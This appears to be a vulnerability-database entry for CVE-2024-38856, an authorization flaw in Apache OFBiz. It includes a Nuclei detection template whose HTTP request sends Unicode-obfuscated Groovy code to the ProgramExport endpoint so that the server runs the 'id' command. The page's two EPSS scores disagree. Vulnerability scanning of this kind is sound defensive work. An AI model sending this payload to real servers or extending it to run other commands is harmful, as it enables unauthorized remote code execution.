Apache OFBiz - Remote Code Execution

2024-08-0509:16:52

ProjectDiscovery

github.com

vulnerability

upgrade

apache

ofbiz

remote code execution

unauthenticated

endpoints

configuration

permissions

screen rendering code

critical

cve-2024-38856

CVSS3

8.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

AI Score

9.6

Confidence

High

EPSS

0.933

Percentile

99.1%

JSON

Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).

id: CVE-2024-38856

info:
  name: Apache OFBiz - Remote Code Execution
  author: Co5mos
  severity: critical
  description: |
    Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).
  reference:
    - https://unam4.github.io/2024/08/05/CVE-2024-38856-ofbiz-12-14-filter%E7%BB%95%E8%BF%87%E5%88%B0rce/
    - https://issues.apache.org/jira/browse/OFBIZ-13128
    - https://lists.apache.org/thread/olxxjk6b13sl3wh9cmp0k2dscvp24l7w
    - https://ofbiz.apache.org/download.html
    - https://ofbiz.apache.org/security.html
  classification:
    epss-score: 0.00045
    epss-percentile: 0.16306
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="Apache_OFBiz"
  tags: cve,cve2024,ofbiz,apache,rce,kev

http:
  - raw:
      - |
        POST /webtools/control/main/ProgramExport HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'

      - type: word
        part: body
        words:
          - 'java.lang.Exception'

      - type: status
        status:
          - 200
# digest: 490a0046304402206f35bcc3e276d91d4e1a05964d5c2544dded6826a8fb086b21e982b01c50548e02201954774503527bdb87c96c2d208ce0bbe1383893272f091ffcef7b5f14e74a5a:922c64590222798bb761d5b6d8e72950